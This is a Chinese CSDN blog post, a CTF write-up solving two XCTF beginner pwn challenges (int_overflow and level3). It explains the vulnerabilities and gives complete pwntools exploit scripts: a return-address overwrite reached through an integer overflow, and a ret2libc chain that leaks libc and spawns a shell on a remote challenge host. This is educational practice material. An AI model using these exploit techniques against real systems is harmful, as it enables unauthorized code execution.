攻防世界pwn(4)

最新推荐文章于 2024-09-23 08:59:46 发布
最新推荐文章于 2024-09-23 08:59:46 发布
阅读量669 收藏
点赞数 1
分类专栏: 任务
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44319142/article/details/89200033
版权

int_overflow

在这里插入图片描述
在这里插入图片描述

call strlen 之后 返回值放在了al寄存器中,这是一个八位的积存器,也就是说如果 s 字符串的长度 大于255 就会造成 整数溢出。

那我们利用这个漏洞干什么呢,我们需要进到else里,将 read 读进来的 s 复制到 dest 中,是一个可以利用的栈溢出。

现在我们知道了可以通过整数溢出到达 栈溢出漏洞,修改程序执行流,使程序跳转到 what_is_this 中。

from pwn import *
p = process("./int_overflow")
p.sendlineafter("choice:","1") 
p.sendlineafter("username:\n","YmCold")

payload = "A"*24 
payload += p32(0x804868b) 
payload = payload.ljust(261,"A")
p.sendlineafter("passwd:\n",payload) 
print p.recvall()

在这里插入图片描述

level3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
没有system,只能去libc库里面找

# -*- coding:utf-8 -*-  
from pwn import *
from LibcSearcher import LibcSearcher
p=remote("111.198.29.45",31144)
elf = ELF("./level3")
plt_write = elf.symbols['write']
plt_read = elf.symbols['read']
got_write = elf.got['write']
vul_func = 0x0804844b #这里用main_addr = elf.symbols['main'] 返回主函数也是可以滴
payload = 'A' * 140 + p32(plt_write) + p32(vul_func) + p32(1) + p32(got_write) + p32(4)
p.recvuntil('Input:\n')#这句千万不能漏了,逻辑出问题就会执行不了,这句的意思就是调用执行嘛,然后就把payload写进去就可以达到目的哟
p.send(payload)
write_addr = u32(p.recv(4))
print hex(write_addr)

libc = LibcSearcher('write', write_addr)
offset = write_addr - libc.dump('write')
system_addr = offset + libc.dump('system')
binsh_addr = offset + libc.dump('str_bin_sh')
payload1 = 'a' * 140 + p32(system_addr) + p32(plt_read) + p32(binsh_addr)
p.recvuntil('Input:\n')
p.send(payload1)
p.interactive()

在这里插入图片描述
好了,新手入门全部做完了,耶,开心~~~
萌新之旅要开始啦~~~

Xuan~
关注
专栏目录
攻防世界pwn-string】
a_silly_coder的博客
05-18 345
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 493
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界:hello_pwn
2301_80216972的博客
04-09 409
pe分析知道是elf文件(elf文件是Linux下的可执行文件,可以在Linux直接运行)ida分析:下载后ida打开找到main函数,F5反编译。
攻防世界pwn小结(一)
最新发布
2401_83086823的博客
09-23 383
逆向分析一下,没什么东西简单的linux指令,即可获得flag。
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 518
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界-pwn-String
weixin_44558065的博客
10-19 363
本人为萌新,以下只是个人看法。
攻防世界PWN-string
Deeeelete的博客
11-15 711
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 563
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1440
学习pwn开始,慢慢来不要急
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1652
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界 Pwn string
MrTreebook的博客
11-22 169
攻防世界pwn string1.checksec看一下保护2.IDA分析一下源码 1.checksec看一下保护 除了PIE其他保护都开了 2.IDA分析一下源码 v3申请了8大小的内存空间,然后在前4个空间中存放了数字68,在后四个空间中存放了数字85。而v4中存放的是v3的内容,并不是68和85两个数字,而是存放了两个数字的内存空间地址。 ...
攻防世界pwn——string
qq_62076255的博客
11-05 724
攻防世界pwn——string
攻防世界 - pwn - string
qq726232111的博客
03-25 516
A、程序分析 1、mov eax, ds:stdin@@GLIBC_2_0 mov [esp+8], eax ; stream mov dword ptr [esp+4], 64h ; n lea eax, [esp+9Ch+s] mov [esp], eax ; s call ...
[PWN](攻防世界)string
ljh15937的博客
09-21 1224
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界hello _pwn总结
RMC131的博客
11-13 4623
checksec 转自:checksec工具使用-pwn – 简书 (jianshu.com) 基本用法:checksec –file=hello_pwn Arch: 系统架构信息,判断是64位还是32位,选择相应的IDA和写相应的exp。 amd64-64-little说明为64位,选用64位的IDA,写64位的exp。 RELRO: Relocation Read-Only (RELRO),此项技术针对GOT/GIFTO(区块链)改写的攻击方式。分为两种,Partial RELRO 和 Full RE
攻防世界——pwn(3)
weixin_44319142的博客
04-11 901
guess_num seed和rand的知识点就是一个伪生成随机数的东西要用ctypes倒入这个库才能用rand 理一下思路,利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 exp from pwn import * from ctypes import * #倒入了可以去找libc库 context.log_level = 'debug' p =...
攻防世界pwn新手练习(string)
BurYiA的博客
12-25 1734
string 首先我们看一下程序的保护机制 程序开了NX(堆栈不可执行)、CANARY(栈保护)和PELRO 程序太长了,我们就不运行了,在IDA中我们查一下有没有什么明显的地方 在这个函数里面 我们发现了一个格式化字符串漏洞,在他的上面有两个输入点,一个是“%ld”格式,一个是“%s”格式 我们在往下看,紧接着的函数里有这么一个东西 代码执行,条件是a1这个数组里面的第一个数字等于第二个数字 ...
攻防世界-pwn hello_pwn(地址溢出)
菜的只能随便写写博客
08-10 775
0x01 检查文件 64位elf 可执行文件 无栈保护 无PIE   0x02 运行程序 程序只有一个输入   0x03 IDA静态分析 主函数: sub_400686() 可以发现只要dword_60106C == 1853186401就可以拿到flag   继续分析发现程序输入的值存储在unk_601068之中,而dword_60106C就在unk...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值